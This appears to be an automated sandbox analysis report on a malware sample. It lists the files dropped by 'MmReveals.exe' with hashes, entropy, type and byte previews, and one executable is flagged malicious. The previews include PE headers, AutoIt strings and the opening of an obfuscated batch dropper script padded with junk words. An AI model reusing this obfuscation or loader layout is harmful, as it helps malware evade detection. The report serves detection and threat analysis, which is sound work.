SHA-512: F96CF9E1890746B12DAF839A6D0F16F062B72C1B8A40439F96583F242980F10F867720232A6FA0F7D4D7AC0A7A6143981A5A130D6417EA98B181447134C7CFE2
Malicious: false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....<.]..............0.............^.... ........@.. ....................... .......F....`.....................................O.......8................A........................................................... ............... ..H............text...d.... ...................... ..`.rsrc...8...........................@..@.reloc..............................@..B................@.......H........A...p..........T................................................~P...-.r...p.....(....(....s.....P...*..0.."........(......-.r...p.rI..p(....s....z.*...0..........(....~P.....o......*..(....*n(.....(..........%...(....*~(.....(..........%...%...(....*.(.....(..........%...%...%...(....*V.(......}Q.....}R...*..{Q...*..{R...*...0...........(.......i.=...}S......i.@...}T......i.@...}U.....+m...(....o .....r]..p.o!...,..{T.......{U........o"....+(.ra..p.o!...,..{T.......
Process: C:\Windows\SysWOW64\cmd.exe
File Type: OpenPGP Secret Key
Category: dropped
Size (bytes): 410350
Entropy (8bit): 7.999534336762385
Encrypted: true
SSDEEP: 6144:PHCFfAFqXYJsA48LxAI5YIzjmWCQLW9MnP+YC6WCdibeQEEmOiylZAZv57Q0QHeI:P4foqX4so5YsuXKkwOzgv5Q0Y
MD5: AFA99B9D405658F98DE0E2F688B11799
SHA1: 7387C5ACA57800C29BCB994BF9910B47AC8E3A3E
SHA-256: 923EAAAEE7BD9310AD06297C07FBBFBD4801A1AC30DA2DE21FB59FF28F958936
SHA-512: 35886B244E6D04FC7B199762944B4906E16CB8D4285E9BD70532A592C8F90E1232E51C34D9D80334BF4DA86264A5EDA429A37FE423A85C14441476F2DC4C0212
Malicious: false
                        Preview:.2.....u....K.wET."v._.3.P.;.4VFv....Q...q.......P.S.AfK.TKkX......j%.E.k..d&.3..)o...5...A....R...H{..o.F.x.[s..Kt.Q+'....}>.....G.. H...RM...B..Egs._......0#...2..,....@.....D.OGP0.T..B...../.pB./2.e.......J.b..=...~....4.`....).}...%6......h.S..]....j.0...!..S+RP...1$.R.aU..6`d.*Y%Yx.....;..(.?. ..a...[.N...C....*e/9.SP-...-k.?v....+...".....&5.9.BR.t......L...9A.:...1a,....6.^M...C..v..G..*.{.....(\!.G.......3.....!........C._n.g...).{Y,6.L!g.k...C.P8...h<..n.;{.. 0.._...M.+..a._<.....%...j...U#mo..;..E..N..p..f..rrc........Z.+....,$#%h...B.PR..S..c..(!.]....:~.L.vs......4..HW.S.'.(*?..N7\a.O.....:w.....9[...._".....{...8...sP.I.1..2..".2.<.js..U.....}..hB.&tT.'.Y/.lu.U.#i>...PE`iS................{,.LaZ...]$L...%...<...N..S.#."...=_.sZ$..?.6.+.!WEv.S....-.l..M/.=p.Jf+...Z.'...;.;.e....%[....\}.....J...kv.....7.1.....o...e.q..1y2.].|-.L,...d7._.h..c.EoC0.f..B\.}ix2_w.?l.!~.*..D.3.c.xx.L62.(b.0...-X."...$.N.i..J.l}h..D.*`....C...
Process: C:\StrLocalGate\MmReveals.exe
File Type: data
Category: dropped
Size (bytes): 38912
Entropy (8bit): 6.504850481956066
Encrypted: false
SSDEEP: 768:K9Fsqib9futLZzWaIxyKw7nxZL96Yk4iARefFilP4Bwh1QwTMvcB:K9FskzWaIxOv/pAfkF/bI8
MD5: FA50D208824BED4A28326CB5138B546B
SHA1: 023558C179E428CBA689D5E3B782FDFE2E962386
SHA-256: BA6B5B6F433B1D99D0023BB25EBC0040CBE328809075E0ED7131FC89FDDFCD8B
SHA-512: 870DB5CD25F559A7BA3FE9414346E5CEA7063F431334E94B719FEEB0B82919A5B55CEC2083BCAA0C072B35366A2FE9088BF48C70B91B84A7C34334F99E59ED79
Malicious: false
                        Preview:.u .u..u.QP.u.WVS.K....e...u$.u .u..u.QP.u.WVS....e...u$.u .u..u.QP.u.WVS.....}e...u$.u .u..u.QP.u.WVS......_e...u$.u .u..u.QP.u.WVS....Ae...u$.u .u..u.QP.u.WVS.....#e...u$.u .u..u.QP.u.WVS.....e......E,..P.a...C....u$.u .u..u..u..u..u.WVS.......d...u$.u .u..u.QPQWVS.d....d...u$.u .u..u.QPQWVS....d...M,...PQ.u .u..u..u..u..u.WVS.9....pd...u..u.WVS.....]d...u$.u .u..u.QPQWVS.....Ad...u.WVS....1d...u..u..u.WVS.O.....d...u.QVS.x.....d...u..u..u..u.WVS.e.....c...u$.u .u..u.QPQWVS.......c...u..u.WVQ.......c...u$.u .u..u.QP.u.WVS....c...u$.u .u..u.QP.u.WVS......c...u$.u .u..u.QP.u.WVS....ic...u$.u .u..u.QP.u.WVS....Kc...u$.u .u..u.QP.u.WVS....-c...u..u.WVQ.......c...u$.u .u..u.QP.u.QVS.....b..W..gL...Y...}..u..E.3.f9...x...3..t...3.9Cpu'.{|Uu!..........u.9.....u...........b..P.......Cl.............s|PVS.7....M(.b...}..t..}.....b...6..(.I...3.PPj1.6.E ....I..=..I.PS..U....E..P.!|..YVS..u.S.6..$.I..E....t'Ht.Ht.Hu&.U.M.... .U.M......M......M.U....M ..
Process: C:\StrLocalGate\MmReveals.exe
File Type: data
Category: dropped
Size (bytes): 56320
Entropy (8bit): 6.3605894597604715
Encrypted: false
SSDEEP: 768:oR3Sh7WscONK1dvq6LqgaHbdMNkNDUySdK8M4INduPbOUGM4INduPbOU+aI4kSm+:e3SdFc9vtmgMbFuyO1MBNfMBNB+x
MD5: 3F6F218E3E0971ECB99CAAA2958B354B
SHA1: A15C014857BF63F17ADA6BA6262F54D211BC048C
SHA-256: 92F9D5FC75BF7F912C816E54F1AD7D90D5525029CEF5963F6C553F3D450C8CDF
SHA-512: 7ED3311383E2FFA611213AEE10E2202BA7887FB7F06A555234BADBC64B2AC3BD010A993247CF49892FD6158B599B695E6ACC3DAEBC9BDB77CE2BBD157C026CE6
Malicious: false
                        Preview:N.G.E.T.P.R.O.C.E.S.S...W.I.N.G.E.T.S.T.A.T.E...W.I.N.G.E.T.T.E.X.T.....W.I.N.G.E.T.T.I.T.L.E...W.I.N.K.I.L.L...W.I.N.L.I.S.T...W.I.N.M.E.N.U.S.E.L.E.C.T.I.T.E.M...W.I.N.M.I.N.I.M.I.Z.E.A.L.L.....W.I.N.M.I.N.I.M.I.Z.E.A.L.L.U.N.D.O.....W.I.N.M.O.V.E...W.I.N.S.E.T.O.N.T.O.P...W.I.N.S.E.T.S.T.A.T.E...W.I.N.S.E.T.T.I.T.L.E...W.I.N.S.E.T.T.R.A.N.S...W.I.N.W.A.I.T...W.I.N.W.A.I.T.A.C.T.I.V.E...W.I.N.W.A.I.T.C.L.O.S.E.....W.I.N.W.A.I.T.N.O.T.A.C.T.I.V.E.....[:>:]]..[:<:]]..Q\E...E.7.E...C...C.W.M._.G.E.T.C.O.N.T.R.O.L.N.A.M.E...\.....G...C...C.A.u.t.o.I.t......F.S.o.f.t.w.a.r.e.\.A.u.t.o.I.t. .v.3.\.A.u.t.o.I.t....F.%s..#.c.o.m.m.e.n.t.s.-.s.t.a.r.t...#.c.s...#.c.o.m.m.e.n.t.s.-.e.n.d...#.c.e...d.0.b.....C...C...C.C.A.L.L.....D.L.L.C.A.L.L.B.A.C.K.R.E.G.I.S.T.E.R...D.R.I.V.E.G.E.T.F.I.L.E.S.Y.S.T.E.M.....A.U.T.O.I.T.W.I.N.S.E.T.T.I.T.L.E...A.U.T.O.I.T.W.I.N.G.E.T.T.I.T.L.E...C.O.N.S.O.L.E.W.R.I.T.E.E.R.R.O.R...D.L.L.C.A.L.L.B.A.C.K.G.E.T.P.T.R...D.L.L.S.T.R.U.C.T.G.E.T.D.A.T.A.....D.L.L.S.
Process: C:\StrLocalGate\MmReveals.exe
File Type: OpenPGP Public Key
Category: dropped
Size (bytes): 61440
Entropy (8bit): 4.95323177323416
Encrypted: false
SSDEEP: 384:JGiwxFr9LE/MpfhwHLWAkqLyH3Per2Wfn2HuboETcKiKjxq/l1qIvtx4MjNyREl:JG5bAGWrT+UTcL4qHq25NKEl
MD5: B9C92C528AAC10D5D9520D157CBDDC57
SHA1: 8F1DE21B9910F1F5601AD1828A47414F4A8CA3DE
SHA-256: 12494B11637277961825098976E7F789AA099CD65A4AEA3616D23E0549F8C960
SHA-512: B4807E4BC67C859D724A9E83F79D611F8ED6617469BBE86542872F64E53E4B98C7F12CB15C9DE7A67BCB3421C5E2E93F850EA35CA5DAFA8F5E83C43B196C83BD
Malicious: false
                        Preview:............................................................................................................................................................................................................................m.m.m.m.m...........................................................................................m...m.m.m.m.m...m.m.................................................................................................................m.m.m.m.m.m.m.....m.m.m.m.m.m.m.m.m.m.m.m.m.m...4.4.4.4.4.4.4.4.4.4.4.4.4.4.4.4.4.4.4.4.4.4.4.m.m.m.m.m.m.m.m.m.4.4.4.4.4.4.4.m.4.4.4.4.4.4.4.m.4.4.4.4.4.4.4.m.4.4.4.4.4.4.4.m.4.4.4.4.4.4.4.m.4.4.4.4.4.4.4.m.4.4.4.4.4.4.4.m.4.4.4.4.4.4.4.m...............................................................................................................................................................f.........................m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.
Process: C:\StrLocalGate\MmReveals.exe
File Type: data
Category: dropped
Size (bytes): 186368
Entropy (8bit): 7.998911837050045
Encrypted: true
SSDEEP: 3072:M7jI9Dh8XC3AL6eQd7xMnPE2f2g+aK1h/XAc569WbediWo2NQEEp0Oiy0AZAZnvv:4jmWCQLW9MnP+YC6WCdibeQEEmOiylZG
MD5: F895D0C5DA4CF4B1A053B28CC3D11957
SHA1: D3CC81C1EF60E924505F805CF188A158AAB05D63
SHA-256: 40BAE31C25DB506601F9C69A11F16227E45124724C7E7E39D1BE7258333F31D9
SHA-512: 1FA814ECAEFD596D2F088E1CFE4B9FBEE7F67E0FD4D65452D13578E4345120F651453D690B56582E680F0FF240DA13A93A317CED7A5CE858D9837C2DBD0997DD
Malicious: false
                        Preview:MC...Y.......Xy;.4....E|1..%{.....47...w).j.{O.W.c...G..p.E.T.C:Zt...y5{a..../.P.*.....h.........V...A..F.:[.S......3.`..bo.%.~)...p....E.M.TFZ.....Af....#..r5.-b>.../.....i......7..C..[aj4..,..d....x.1B..m..E........{...2.0m.6......._.bP2`...".]~...N..u.Y..e@x.......XX...O-.y7[...z...u....l...X&-/...$"....i>j_..]OL,......1..#.l.s..u}......nx..V..`......X...&.nY.~._.1...U..X..OPB...q..!...[.$.[...A."6..:....*..+.......D.#.!Zm..(.&...+...>.u..~W..L..P#\}....Qz...l.nCQ..O.....(M.rr..D..C....KS....pf..?.~t.|..2.p.kF.....LCd...I.....YV...{...<2..iwi.:).g1.S..8i........Q.N.k..N.V..Y3."b.J..+ .}.."..-...t...-......._...t.X..?Gf..o.4.On..m;3..T...B..P.........$~uG{..<.....,..o...}..Q.S...m......J...')%....Tv.:...d....h...K?oG6 Q.D.Z..F ...m=.j..i..].......?...s.n.$..7I.?.m...hL)Em\...R....T..Cb.z...!......U?H:.m.y..dz.i.b.....7L...X7..hJB.g%9.Q......$.C%.E.ML..+.Ik.U#.u..F6.<b.`c.."z_ .3.......`p,,S.....20.....3....C.3 .9.E.$4m.@..).......&G]{...
                        Process:C:\StrLocalGate\MmReveals.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):23278
                        Entropy (8bit):7.990246299434285
                        Encrypted:true
                        SSDEEP:384:PiH1txr3Hp/f0lJoBBucnUmu/gQ4p8uzKGVbwMI+pwjJb4q1/WlZHfT7PLV:aH1txTHNuoBBuqU1gwu/IMwjV5U/T7Z
                        MD5:744D957358190ED5E658E5410EFFB89A
                        SHA1:8C2235E8EFFB359C0F1D53768A0FA44CF93AE63F
                        SHA-256:BE303E92319DF05E83E93B6C632F2476EE9AF84F5D5A3DEFDE788D94FB4505D3
                        SHA-512:46CC1DEC09013EF03FC4B794A2B1CBA1667D3E00FB3D740BD662E342A7D9CB108F74AA83BFE6C96F5EC6F106428434E6255F462103D4CC5FA5A828E9FDEF2CFA
                        Malicious:false
                        Process:C:\StrLocalGate\MmReveals.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8192
                        Entropy (8bit):6.5483294401297645
                        Encrypted:false
                        SSDEEP:96:xuMgMAEpjysGMoV74ORLgEGZr+Kvd35u1G5qLHrqvcDwmXDDSr/l8OoAFsizZ2oz:xPAEByss7XLNUrnliH5QlEboAtyYba1
                        MD5:3DFA6BF53AD5515FDA77AEEF0D76FE4D
                        SHA1:4B101F073DC15E4E0B245D761B7B9E031C8E75B4
                        SHA-256:C164721BF7A110FC79554B7D55DA8B824F09708682008E7B1B965A1ADD35BA86
                        SHA-512:218B484875A3245BC8B16DBA238DD2E477514B56AC1861BB1E477944570DE06DBCE6DA778D0C6B775CF7C6FD22E4CAAC4BE3FA22106E748293C248867B72E014
                        Malicious:false
                        Process:C:\StrLocalGate\MmReveals.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):13312
                        Entropy (8bit):6.5759444698507625
                        Encrypted:false
                        SSDEEP:384:qqKWeMdoWDpWpbdIoQYfkbrOzCeTmCBo0v:jeINDpWPIDJ0vv
                        MD5:E769F265D7749DDEA00C3DF2FD1B8056
                        SHA1:316E8C459279E0F4178EEA894815B9043C6BD9B9
                        SHA-256:EF40A243A2355A6C71A25BC3B396D86757E90F8F8A6656D568AFEF75B29A7A41
                        SHA-512:16B2AA1E5263109E45593B03FCF449CB2F0053B97E4607FC9FDFE3294497873939FAC0BBF2E2D925D135E378ED57E991E3D8A7A828FD7776716B6DE7F4B5443E
                        Malicious:false
                        Process:C:\StrLocalGate\MmReveals.exe
                        File Type:OpenPGP Secret Key
                        Category:dropped
                        Size (bytes):6144
                        Entropy (8bit):7.939485352823763
                        Encrypted:false
                        SSDEEP:96:OeNvLIDiOzXKAGFkXPgZqF3HwV58LNzFN/B7jJjmekHUE4pgr5WGe3:OeB6rRGFkP3I+BnvJ6eXbGe3
                        MD5:815798C438E7114C729702E6615DEB2F
                        SHA1:C409F3CF1D68E1B15A4CAAC5BDDB3917042E1E13
                        SHA-256:0497B121DEFB623951C64AAE2F8163455EB156A8D697F0E274FCB41DC71E3A00
                        SHA-512:2F20ED92C61392C913D099265983FD1C57F425C1865AE8F0E72DF691561A2857AF12539E43241B3022A9539934C48A19FA8F67FEB844D23B5E82089B7E19D3FE
                        Malicious:false
                        Process:C:\StrLocalGate\MmReveals.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):10240
                        Entropy (8bit):6.541078079670849
                        Encrypted:false
                        SSDEEP:192:Effs/ecsUAo/HaHbx91Q7ridl8Uvh306IEZ/F6Q+2aM2o:YfKesAGa7Hl8Uvhk8F6Q+ldo
                        MD5:1465936467E006225FD6AC4AF0786FB9
                        SHA1:7DD7AD433B92F0B6F4D33AAC37362315B77CD5BE
                        SHA-256:3E26CB1284308905B98BF70844571FA78AD7F93F0F181AB75EEBEA22DD0AE7BA
                        SHA-512:364C92BBC1F400EDAF03DFA42073FD57B8DEA27CE5F48C22D72593F7310E7F3E4F299C2173B417AA28A4AEE29C5927EF9313011EC13F57EF59FD200531973EB3
                        Malicious:false
                        Process:C:\StrLocalGate\MmReveals.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):27648
                        Entropy (8bit):6.644465569593187
                        Encrypted:false
                        SSDEEP:768:RzJsDXtiC84Ll9iRfdB1gpjXgckS9cAXKOd+3F:RzJW784Lle+1X/tcATs3F
                        MD5:01267CCB3155A2EEF1EDF24558E912B4
                        SHA1:3B5747832EE31B9E9095B1D8375A056D6428389D
                        SHA-256:2B714805547AECEB1B970147E8E5EF58376F544158595F90F35B082A5039973B
                        SHA-512:55D95C3CD927FE55CBF9AC4643DA71D3F83D28F35C11211C39D78A2A886D7D6AFCFEA5F8A5C4E0BC659D30E83F4E10B5C2D994608DE6D7E9EBADFC98A5075997
                        Malicious:false
                        Process:C:\StrLocalGate\MmReveals.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):47104
                        Entropy (8bit):6.535870496996456
                        Encrypted:false
                        SSDEEP:768:ssu1izubGntN6IZOjAV0SMg4XJ80RGrkx3zN3AFR97T98+sDkXLAlf:sl2ub2tBOjAeKmCFYNB3OFTR7bAlf
                        MD5:4165E5E1422A6A39D353CEFDD571C734
                        SHA1:B5AFDC5CB65F92E35DBC89F42F8E6E323F1AFB18
                        SHA-256:9E4E5030BD410099D96B5990B4B7FE00B82EC8A6A160CE14BFD0B06C4AD0D494
                        SHA-512:8703DAFF4B5310A5F22D7D660872958D808B23FBB9C6CDFA1F46A556AB6799ED61D9A524155515674551DBB9619F0CC41AEEDDD89191C79E01DEB4ADE8C508C7
                        Malicious:false
                        Process:C:\StrLocalGate\MmReveals.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):41984
                        Entropy (8bit):6.487364785579847
                        Encrypted:false
                        SSDEEP:768:qoDCHT5xv8xV9J7J6Ax6zNGB0toYyncyH9JRpHbDYA22HbbjNbkBYYTrI3:JC7v8xV96AE11yHxpfYAz7FbkdHI3
                        MD5:D7355E9B85613F6E502632DAC93C9552
                        SHA1:8C87ED802BA382D90D4732128BA85689FF63625B
                        SHA-256:B895AE581AB3CD38897C5144C17D519F5ECCE9D40B2BB0EB3D45E604E96A1A17
                        SHA-512:38B812ED646EEB028C434CF43F2CBF373C4700CE6548DED490A8B75BB03E0B54D031F3C0C42415D71B652057668AC153EDDA9F77AF0116D412C72046F66C15AA
                        Malicious:false
                        Process:C:\StrLocalGate\MmReveals.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):52224
                        Entropy (8bit):3.7344593475657724
                        Encrypted:false
                        SSDEEP:768:lq9BxyyM0Dj2Bmgari0UPD/3Efrafd0maNBZikE:lq9Bxhgari/D/3EfraF0HikE
                        MD5:2DB28D8DAE81D58781C54234889596F4
                        SHA1:AC258FA1A10E0CFA7FC1966C9AB747AF10910F91
                        SHA-256:E5EC151ED3884450B594DB14292879D070D1533B8464269347DAE4010FECC7DF
                        SHA-512:6C02CEAB55A1FDF75D5EC2BF80D8CB454AAE4F75825AFA5C572A5E113EA4558FB31CE53C342C54EDBE7B8AC8DC49A03AA449CE88543D6B38F7F87D12183B3C6D
                        Malicious:false
                        Preview:T.T.A.B.............S.H.O.W.D.R.O.P.D.O.W.N.........H.I.D.E.D.R.O.P.D.O.W.N.........A.D.D.S.T.R.I.N.G...............D.E.L.S.T.R.I.N.G...............F.I.N.D.S.T.R.I.N.G.............S.E.T.C.U.R.R.E.N.T.S.E.L.E.C.T.I.O.N...........G.E.T.C.U.R.R.E.N.T.S.E.L.E.C.T.I.O.N...........S.E.L.E.C.T.S.T.R.I.N.G.........I.S.C.H.E.C.K.E.D...C.H.E.C.K...U.N.C.H.E.C.K...G.E.T.S.E.L.E.C.T.E.D...........G.E.T.L.I.N.E.C.O.U.N.T.........G.E.T.C.U.R.R.E.N.T.L.I.N.E.....G.E.T.C.U.R.R.E.N.T.C.O.L.......E.D.I.T.P.A.S.T.E...............G.E.T.L.I.N.E...S.E.N.D.C.O.M.M.A.N.D.I.D.......G.E.T.I.T.E.M.C.O.U.N.T.........G.E.T.S.U.B.I.T.E.M.C.O.U.N.T...G.E.T.T.E.X.T...G.E.T.S.E.L.E.C.T.E.D.C.O.U.N.T.................I.S.S.E.L.E.C.T.E.D.............S.E.L.E.C.T.A.L.L...............S.E.L.E.C.T.C.L.E.A.R...........S.E.L.E.C.T.I.N.V.E.R.T.........D.E.S.E.L.E.C.T.................F.I.N.D.I.T.E.M.................V.I.E.W.C.H.A.N.G.E.............G.E.T.T.O.T.A.L.C.O.U.N.T.......C.O.L.L.A.P.S.E.....E.X.P.A.N.D.....m.s.c.t.l.s._.s.
                        Process:C:\StrLocalGate\MmReveals.exe
                        File Type:ASCII text, with very long lines (408), with CRLF line terminators
                        Category:dropped
                        Size (bytes):7988
                        Entropy (8bit):5.05530450415697
                        Encrypted:false
                        SSDEEP:192:5+H8E74QpXW25+VLVJqam2fSz4WtJZJFCIMXVTeXE3WKyK:5J0s2spyamcSkWtrCBp3WKyK
                        MD5:8B46EC4185CBD19EF8AF364753B6D10D
                        SHA1:B8406FED6DFA3B76E60E552F77A26A41985DCD4B
                        SHA-256:E77DD54FFDE60F92A29C02402771E9EF577F71A03B351A4A6FCAB2F16EA84D71
                        SHA-512:7646F6F9804DA67AFE0086F6871B8E31BAE646E1ABB2BAF6D2CD8D8752494658280D2E736D9204867A0A2DE14D1E87394FBFC6C5A3B8A5A74D196D1C2B39156B
                        Malicious:false
                        Preview:Set Cleared=d..MLVqInvasion Hard West Contracts Trick Debate ..yEiEnabled Sandra Cunt Dr Gm Scheduling Hungarian Aim Governing ..tvTYColorado Health Stronger Requiring Mattress Grande Pakistan Valued Paris ..lLTsDriver Nicaragua Transportation Commentary Penis ..XCVisa Edt Tft Offline Owner ..YykAssault Wind Difference Sometimes Nintendo Multimedia Phones Spare Move ..lrDTitle Qualities Jefferson Listening Process Exhibitions Purse ..TcDisc Laser Af Etc Dial Rep Bi Kick ..gAwONebraska Writes Horny ..Set Former=E..ULPuts Transparency ..bxVjBound Stanford Andrews Fewer Beautiful Parks Liverpool Extent ..yDHcPrimarily Provides Contrast Boat ..gTChubby Thu Mainstream Employ Entity Grass Fighter Enable Preservation ..JbxRecovery Welfare ..aVwChapter Evident ..PdContributing Deployment Encouraging ..XXkCarriers Sg Schema Fatal Calculator Woman Lighting ..ZYXLights ..kEZzRecommendation Activation Ms Internship Lbs Yang Clinton Catalog ..Set Arrangements=6..LAKill Neighborhood ..LqAppointment
                        Process:C:\Windows\SysWOW64\cmd.exe
                        File Type:ASCII text, with very long lines (408), with CRLF line terminators
                        Category:dropped
                        Size (bytes):7988
                        Entropy (8bit):5.05530450415697
                        Encrypted:false
                        SSDEEP:192:5+H8E74QpXW25+VLVJqam2fSz4WtJZJFCIMXVTeXE3WKyK:5J0s2spyamcSkWtrCBp3WKyK
                        MD5:8B46EC4185CBD19EF8AF364753B6D10D
                        SHA1:B8406FED6DFA3B76E60E552F77A26A41985DCD4B
                        SHA-256:E77DD54FFDE60F92A29C02402771E9EF577F71A03B351A4A6FCAB2F16EA84D71
                        SHA-512:7646F6F9804DA67AFE0086F6871B8E31BAE646E1ABB2BAF6D2CD8D8752494658280D2E736D9204867A0A2DE14D1E87394FBFC6C5A3B8A5A74D196D1C2B39156B
                        Malicious:false
                        Preview:Set Cleared=d..MLVqInvasion Hard West Contracts Trick Debate ..yEiEnabled Sandra Cunt Dr Gm Scheduling Hungarian Aim Governing ..tvTYColorado Health Stronger Requiring Mattress Grande Pakistan Valued Paris ..lLTsDriver Nicaragua Transportation Commentary Penis ..XCVisa Edt Tft Offline Owner ..YykAssault Wind Difference Sometimes Nintendo Multimedia Phones Spare Move ..lrDTitle Qualities Jefferson Listening Process Exhibitions Purse ..TcDisc Laser Af Etc Dial Rep Bi Kick ..gAwONebraska Writes Horny ..Set Former=E..ULPuts Transparency ..bxVjBound Stanford Andrews Fewer Beautiful Parks Liverpool Extent ..yDHcPrimarily Provides Contrast Boat ..gTChubby Thu Mainstream Employ Entity Grass Fighter Enable Preservation ..JbxRecovery Welfare ..aVwChapter Evident ..PdContributing Deployment Encouraging ..XXkCarriers Sg Schema Fatal Calculator Woman Lighting ..ZYXLights ..kEZzRecommendation Activation Ms Internship Lbs Yang Clinton Catalog ..Set Arrangements=6..LAKill Neighborhood ..LqAppointment
                        Process:C:\StrLocalGate\MmReveals.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):44032
                        Entropy (8bit):7.8507813814985985
                        Encrypted:false
                        SSDEEP:768:g0kkuhsRqI5o+oyyxVxCaw2F8aP6VOHQznzp8G7bJu1UY3dLi29NcNngX+F+2tz6:g06LDykFIcizp97bA3EKNcpzjIt
                        MD5:CB12A78DA9BDB4CE51D789154D460775
                        SHA1:9FA7C905A2CC725E92717EC6AFA50472C7FF1819
                        SHA-256:56A77E5EFD1777B97119D3EB1AA0991F2B7940260221E8CBC11B6D3D8E959BFB
                        SHA-512:7C48062F1A551B66FE6D08985AB0220A8F8491E29C0A784D273EBD248F808535BA25C936EC3CEBC18B3C501D7375A27A94177FBE72AC73379763B9F6B3EC9A88
                        Malicious:false
                        Process:C:\StrLocalGate\MmReveals.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):20480
                        Entropy (8bit):7.984960013127064
                        Encrypted:false
                        SSDEEP:384:4WdiBlONel2gNA5ysqre+kfYx161larmyF4cUF+JEdYAHLaJC51goV:4WdinOEgg+ys6kQ3+laXM77HLqnoV
                        MD5:CF5EBE3EA303D4329F2F8B9F1A746BC9
                        SHA1:2C9DE83E640FDC1813113EC9C2EFC9F2A7A6DF18
                        SHA-256:244D2BCCF0F0D141736B7E6F9119B9DA16452A4D57E7FD23DABFA97B37B8C2A2
                        SHA-512:D77470A64D7BD7B45A61D4A3F1FCC136B444BEEEDCC5408386F9F69AC82038607C5FCEEA0CD18418CD5C0FD362C10A9A69EFD87A24D5E08E9CC6BEEF45701D47
                        Malicious:false
                        Process:C:\StrLocalGate\MmReveals.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):53248
                        Entropy (8bit):6.652892461856609
                        Encrypted:false
                        SSDEEP:768:6+ylIt0su0B4y+aZmzddtw1E1Yd5dArqsfGuYJhLgBF9OR7F8ufnz4kVDz:pylIusu0B4MmHtt1OPeRQnz4qDz
                        MD5:AFCDA50A83DF21E1BD26C94D76C62FE8
                        SHA1:197C1EC9CCCF431CDF4D32A52836F3E0376D7CB4
                        SHA-256:5B437896E2856B002151ED7987139A41AA5FAF61C106D4084EA99D9C990BF83F
                        SHA-512:98820F90FEA6C0D6B0CA7FB24C91A24ABDB222043F4C7E624824D384CAC0EDF6DF37C77C2058F581D3AD29313A9615F0B42C7B8F5BA65C4D4FA282A0CFFF4937
                        Malicious:false
                        Process:C:\StrLocalGate\MmReveals.exe
                        File Type:OpenPGP Secret Key
                        Category:dropped
                        Size (bytes):164864
                        Entropy (8bit):7.998940246424731
                        Encrypted:true
                        SSDEEP:3072:PuCXNQFfAmB7JT2hFyXIi4ysn+y0Izo1VmLxAa7e1QVVZA/1D7uu:PHCFfAFqXYJsA48LxAI5YIu
                        MD5:9A38088063BEFBFE5BC42CE1EFEE415C
                        SHA1:BA053ED65728229E97440E32F35E135112727109
                        SHA-256:A41DA2AD3185828A33445F225D53F194E4A1B04272492C53BD99278FE7B37AF8
                        SHA-512:FC3E9715286F6EF95E33544C971DBF51B0CC5CA293E3CB348B7A2245D52D6B7407FF3DDA31C43A61AE6C99E1F9A891680431D76DBBFE097B7F2D5B1D9C3C1664
                        Malicious:false
                        Process:C:\StrLocalGate\MmReveals.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):39668
                        Entropy (8bit):6.982356594854894
                        Encrypted:false
                        SSDEEP:768:hrUCVoyOQ5DuOKHnPiamE9w97OUg4eVDqp8VQ7A:hrnVRCOa69E9wFOUg/Rqp8b
                        MD5:9B2CC3CFE829D7EC1D60A4BC50FD9097
                        SHA1:8E346E7C6ABE42A06754F89A626A591E2C623AAB
                        SHA-256:D615C12587DC55349F2403072D3040CCB14AF82B4CB1721B989F7FF65C9292EB
                        SHA-512:8324797008DF611DC95BCFAAF72714AC438D8B31ED550DCD910958A6B4F064D78B8B97D5E1668C249762CECA0C9B585BF9A18E83E340EB29A786D0151A116A57
                        Malicious:false
                        Process:C:\StrLocalGate\MmReveals.exe
                        File Type:PDP-11 overlaid pure executable
                        Category:dropped
                        Size (bytes):29696
                        Entropy (8bit):6.475457272197305
                        Encrypted:false
                        SSDEEP:768:wb3jsJhQlEF2VVay1N5J3SoO6Qku2ox3hOk3Y:wbgjQWq8GV3jOTJh1o
                        MD5:5A266EEC30EACC63DAA99878F4CB0B72
                        SHA1:050076B95A44BB16AB24B63B15C5DD5459B85874
                        SHA-256:6561B06876FEF0C918D554B61E9515EF8E4BC9029ABCBA1E7268D82D423D8DA7
                        SHA-512:F0667E3DDA0C10842EB2E4FEB09622C72B665299C5C9D9EC0E9E659B7F3B6B4D0F6C655FA4AA76F11B8907DAB8A04246F0EDAEE1EB357539A8FAE0236703FCD4
                        Malicious:true
                        Preview:............!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L...y..U..........".................*.............@.................................w.....@...@.......@.....................L...|....................8..0....0...q...;..............................@X..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...............................@..@.reloc...q...0...r..................@..B.........................................................................................................................................................................................................................................................................................................DQL......h..C.....Y...L..h.C..{..
                        Process:C:\StrLocalGate\MmReveals.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):17408
                        Entropy (8bit):6.509527573507022
                        Encrypted:false
                        SSDEEP:192:OrQBcgyTMPtcETjr3D80GMKTY89cKyjB+mOofFsBk2yR6DXAhADUh95ybOIOo9AC:OrCcLgTjr3D8kcHyjJFsBNywAhADsULr
                        MD5:7833DB1E09C318E19A18117D87960318
                        SHA1:701E55234EAFAE688E8149DD0FA74A597F7D0EA8
                        SHA-256:8E613765BBA64B8A3D650FDBA3DFD7AD40558AC9319336F48389AC847FDFDA46
                        SHA-512:75777BBC0410396C421476FE2502C612FAE363ED87C948DC97617BBFBE668F04DF260AC43C8DD15EEC661529B5D6B3F434927ADFA53C6A28757101BFA8595093
                        Malicious:false
